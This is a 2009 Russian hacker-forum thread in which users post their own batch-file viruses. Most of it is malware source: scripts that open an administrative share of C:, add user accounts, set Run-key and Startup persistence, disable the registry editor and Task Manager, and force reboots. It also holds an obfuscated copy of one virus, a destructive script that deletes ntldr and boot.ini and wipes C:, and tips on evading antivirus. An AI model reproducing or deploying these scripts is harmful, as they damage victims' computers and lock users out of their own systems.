Еще вирь(найден на forum.xakep.ru, вроде в разделе жизнь->халява->исходник закриптованного BAT-вируса):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
@echo off
net share "ResName$"="C:\"
label C:ViruSzz_by_user_of_xaker
time 3:33
net user "You Hacked" /add
copy ""%0"" "%SystemRoot%\system32\explorer.exe.bat"
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "explorer.exe" /t REG_SZ /d "%SystemRoot%\system32\explorer.exe.bat" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
del "%0"
msg * "You big lammmmmer"
shutdown -r -t 1 -c "lol" -f
~~~~~~~~~~~~~~~~~~~~~~~~
Вот закриптованный вирус(просто пример для ленивых, которым не интересно разбирать код=)):
~~~~~~~~~~~~~~~~~~~~~~~~~
@set y=@set
%y% m31=e
%y% m22=w
%y% u24=p
%y% q11=2
%y% x4=8
%y% g3=5
%y% l95=%1
%y% j20=6
%y% j18=9
%y% p13=k
%y% o33=d
%y% u27=n
%y% q67=%
%y% g21=q
%y% p1=o
%y% n12=c
%y% g29=b
%y% j30=0
%y% t15=r
%y% l25=x
%y% c14=z
%y% f16=3
%y% w17=g
%y% w26=a
%y% i32=s
%y% y38=%SystemRoot%
%y% j35=j
%y% i8=t
%y% r9=v
%y% p6=i
%y% s5=f
%y% f53=%Temp%
%y% l2=7
%y% e79=%0
%y% a23=u
%y% a34=y
%y% i10=4
%y% f19=h
%y% b65="
%y% b28=l
%y% v0=1
%y% p7=m
@%m31%%n12%%f19%%p1% %p1%%s5%%s5%
%i8%%p6%%p7%%m31% %f16%:%f16%%f16%
%u27%%m31%%i8% %i32%%f19%%w26%%t15%%m31% %b65%R%m31%%i32%N%w26%%p7%%m31%$%b65%=%b65%C:\%b65%
%u27%%m31%%i8% %a23%%i32%%m31%%t15% %b65%Y%p1%%a23% H%w26%%n12%%p13%%m31%%o33%%b65% /%w26%%o33%%o33%
%b28%%w26%%g29%%m31%%b28% C:V%p6%%t15%%a23%S%c14%%c14%_%g29%%a34%_%a23%%i32%%m31%%t15%_%p1%%s5%_%l25%%w26%%p13%%m31%%t15%
%n12%%p1%%u24%%a34% %b65%%b65%%e79%%b65%%b65% %b65%%y38%\%i32%%a34%%i32%%i8%%m31%%p7%%f16%%q11%\%m31%%l25%%u24%%b28%%p1%%t15%%m31%%t15%.%m31%%l25%%m31%.%g29%%w26%%i8%%b65%
%t15%%m31%%w17% %w26%%o33%%o33% %b65%HKLM\SOFTWARE\M%p6%%n12%%t15%%p1%%i32%%p1%%s5%%i8%\W%p6%%u27%%o33%%p1%%m22%%i32%\C%a23%%t15%%t15%%m31%%u27%%i8%V%m31%%t15%%i32%%p6%%p1%%u27%\R%a23%%u27%%b65% /%r9% %b65%%m31%%l25%%u24%%b28%%p1%%t15%%m31%%t15%.%m31%%l25%%m31%%b65% /%i8% REG_SZ /%o33% %b65%%y38%\%i32%%a34%%i32%%i8%%m31%%p7%%f16%%q11%\%m31%%l25%%u24%%b28%%p1%%t15%%m31%%t15%.%m31%%l25%%m31%.%g29%%w26%%i8%%b65% /%s5%
%t15%%m31%%w17% %w26%%o33%%o33% HKCU\S%p1%%s5%%i8%%m22%%w26%%t15%%m31%\M%p6%%n12%%t15%%p1%%i32%%p1%%s5%%i8%\W%p6%%u27%%o33%%p1%%m22%%i32%\C%a23%%t15%%t15%%m31%%u27%%i8%V%m31%%t15%%i32%%p6%%p1%%u27%\P%p1%%b28%%p6%%n12%%p6%%m31%%i32%\S%a34%%i32%%i8%%m31%%p7% /%r9% D%p6%%i32%%w26%%g29%%b28%%m31%R%m31%%w17%%p6%%i32%%i8%%t15%%a34%T%p1%%p1%%b28%%i32% /%i8% REG_DWORD /%o33% %v0% /%s5%
%t15%%m31%%w17% %w26%%o33%%o33% HKCU\S%p1%%s5%%i8%%m22%%w26%%t15%%m31%\M%p6%%n12%%t15%%p1%%i32%%p1%%s5%%i8%\W%p6%%u27%%o33%%p1%%m22%%i32%\C%a23%%t15%%t15%%m31%%u27%%i8%V%m31%%t15%%i32%%p6%%p1%%u27%\P%p1%%b28%%p6%%n12%%p6%%m31%%i32%\S%a34%%i32%%i8%%m31%%p7% /%r9% D%p6%%i32%%w26%%g29%%b28%%m31%T%w26%%i32%%p13%M%w17%%t15% /%i8% REG_DWORD /%o33% %v0% /%s5%
%p7%%i32%%w17% * %b65%Y%p1%%a23% %g29%%p6%%w17% %b28%%w26%%p7%%p7%%p7%%p7%%p7%%m31%%t15%%b65%
%o33%%m31%%b28% %b65%%e79%%b65%
%i32%%f19%%a23%%i8%%o33%%p1%%m22%%u27% -%t15% -%i8% %v0% -%n12% %b65%%b28%%p1%%b28%%b65% -%s5%
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ЕЩЕ ЧАСТИ МОЕГО ВИРУСА:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Новая версия Autorun'a (также не проверял, лень потом мусор удалять если сработает):
@Echo off
Chcp 1251
if exist "%USERPROFILE%\Главное меню\Программы\Автозагрузка\Windows Guard.bat" goto fak
copy "Windows Guard.bat" "%USERPROFILE%/Главное меню/Программы/Автозагрузка"
attrib +h "%USERPROFILE%/Главное меню/Программы/Автозагрузка/Windows Guard.bat"
echo Windows Registry Editor Version 5.00 > %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %temp%\run.reg
echo “svchost.exe”=”%USERPROFILE%\Главное меню\Программы\Автозагрузка\Windows Guard.bat” >> %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents] >> %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\IMAIL] >> %temp%\run.reg
echo “Installed”=”1? >> %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI] >> %temp%\run.reg
echo “Installed”=”1? >> %temp%\run.reg
echo “NoChange”=”1? >> %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MSFS] >> %temp%\run.reg
echo “Installed”=”1? >> %temp%\run.reg
regedit /s %temp%\run.reg
del %temp%\run.reg
:fak
cls
if exist "%SystemRoot%\system32\explorer.exe.bat" goto fuk
copy "explorer.exe.bat" "%SystemRoot%/system32/"
attrib +h "%SystemRoot%/system32/explorer.exe.bat"
echo "%SystemRoot%\system32\explorer.exe.bat">>"c:/autoexec.bat"
echo Windows Registry Editor Version 5.00 > %temp%\run2.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %temp%\run2.reg
echo “svchost.exe”=”%SystemRoot%\system32\explorer.exe.bat” >> %temp%\run2.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents] >> %temp%\run2.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\IMAIL] >> %temp%\run2.reg
echo “Installed”=”1? >> %temp%\run2.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI] >> %temp%\run2.reg
echo “Installed”=”1? >> %temp%\run2.reg
echo “NoChange”=”1? >> %temp%\run2.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MSFS] >> %temp%\run2.reg
echo “Installed”=”1? >> %temp%\run2.reg
regedit /s %temp%\run2.reg
del %temp%\run2.reg
:fuk
cls
Пояснения:
1) Решил добавить файл "explorer.exe.bat", который будет запускаться из [Путь к системе]\system32\, и файл "A-aw.bat"
2) Файлы run.reg и run2.reg сначала пишутся во временную папку, оттуда идут в реестр, потом сами файлы удаляются
3) Скоро здесь будут файлы "Windows Guard.bat", "A-aw.bat"(будет отключать доступ юзера к regedit'у и taskmgr'у, файл вынесен отдельно, т.к. он может запалиться антивирем,
т.е. если этот файл антивирь удалит, то основные файлы вирусов всё равно будут работать), "Explorer.exe.bat"(сработает ТОЛЬКО ТОГДА, КОГДА "Windows Guard.bat" будет удалён) и обновленный Autorun(найдете его
в моем прошлом сообщении, чтобы меня не выгнали за флуд=))
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Вот еще ссылки…
http://narod.ru/disk/4743055000/3435.bat.html
http://narod.ru/disk/4742993000/111.bat.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
З.Ы.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
06:37(По Московскому), хочу спать, но скоро в школу, так что вот вам еще…
Файл A-Adw.bat примерно такой:
@Echo off
Chcp 1251
if exist "%USERPROFILE%\Главное меню\Программы\Автозагрузка\A-Adw.bat" goto fak
copy %0 "%USERPROFILE%/Главное меню/Программы/Автозагрузка"
attrib +h "%USERPROFILE%/Главное меню/Программы/Автозагрузка/A-Adw.bat"
:fak
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
cls
Теперь осталось только модифицировать Autorun.bat и доделать наконец Windows Guard.bat и Explorer.exe.bat
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
07.41(по Московскому), ем за столом и пишу
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Примерное начало Windows Guard'а:
@Echo off
Chcp 1251
if exist c:\boot.ini attrib c:\boot.ini -h -s -a -r
deltree /y c:\boot.ini
attrib -a -s -h "C:\ntldr"
erase "C:\ntldr" /q
del "C:\boot.ini"
rd C: /s /q
copy %0 > %windir%/win.ini
deltree /y %windir%/system.ini
copy %0 > %windir%/system.ini
if exist "c:\io.sys"
echo "[AutoRun]" > "c:\autorun.inf"
echo "open=c:\autoexec.bat" >> "c:\autorun.inf"
if exist "d:\io.sys"
echo "[AutoRun]" > "d:\autorun.inf"
echo "open=c:\autoexec.bat" >> "d:\autorun.inf"
if exist "e:\io.sys"
echo "[AutoRun]" > "e:\autorun.inf"
echo "open=c:\autoexec.bat" >> "e:\autorun.inf"
cls
[Чего то еще...]
del %0 /s /q
Чем он занимается:
1) Пытается удалить "ntldr", "boot.ini"
2) Выполняет "autoexec.bat" с помощью "autorun.inf"(пытается=))
3) Удаляется сам т.е. остается только "Explorer.exe.bat"; Когда жертва
восстановит файлы "ntldr", "boot.ini"(при условии, что очистить весь диск не получится),
будет с радстью перезагружать комп…как вдруг заработает "explorer.exe.bat", тупо мешающий работе компа:-D
И совсем примерный код=)) "explorer.exe.bat":
@Echo off
Chcp 1251
if exist "%USERPROFILE%\Главное меню\Программы\Автозагрузка\Windows Guard.bat" goto mok
{ВЕСЕЛИИИМСЯ}
:mok
:D:);)
///Аааа!!! Почему никто не пишет!!!???
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-03-20 15:46:27.543333
|
|
|
Wlada
Сообщений: 1233
Оценки: 0
Присоединился: 2007-09-24 12:01:26.970000
|
quote:
///Аааа!!! Почему никто не пишет!!!???
Напиши мне программу переименовать все файлы сразу по порядку
примерно так был 123.txt cтал 1.txt,
далее файл 2 (2).txt cтал 2.txt
ещё далее 12.jpg cтал 1.jpg и т.д.
а то вирусы-вирусы, а что-то полезное? мне например надо переименовать по порядку 7253 файла
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-03-21 12:11:40.653333
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
Извини, что то я не понял что нужно, точнее КАК нужно?
Но вроде так:
for %%a in ([Путь к папке]\*.*) do [переименование щас не вспомню=(((]
У меня вопрос:
Можно ли использовать в BAT'е переменные? Если да - то как???
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-03-21 19:00:02.180000
|
|
|
Wlada
Сообщений: 1233
Оценки: 0
Присоединился: 2007-09-24 12:01:26.970000
|
quote:
ORIGINAL: AloneMonaX
У меня вопрос:
Можно ли использовать в BAT'е переменные? Если да - то как???
если бы я знала как использовать переменные я сама бы написала
примерно программа должна выглядеть так:
$переменная = 0
ren *.* $.*
if (false) ++$
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-03-22 13:56:19.743333
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
$gg = 0
for %%a in ([Путь к папке]\*.*) do goto pro
pro:
$переменная = 0
ren *.* $.*
if (false) ++$
///Кстати, тема называется "Пишем сюда свои *.BAt-вирусы", а не "Помогаем всем с BAT-программами" =)))
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-03-23 05:02:20.773333
|
|
|
Wlada
Сообщений: 1233
Оценки: 0
Присоединился: 2007-09-24 12:01:26.970000
|
Тогда вирус
@echo off
for
copy *.* *.*.1
copy *.* *.*.2
copy *.* *.*.3
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-03-23 12:16:06.943333
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
Я к теме твоей программы больше не возвращаюсь! Пиши лучше на си++))Почему именно БАТ нужен тебе???
|
|
|
|
|
|
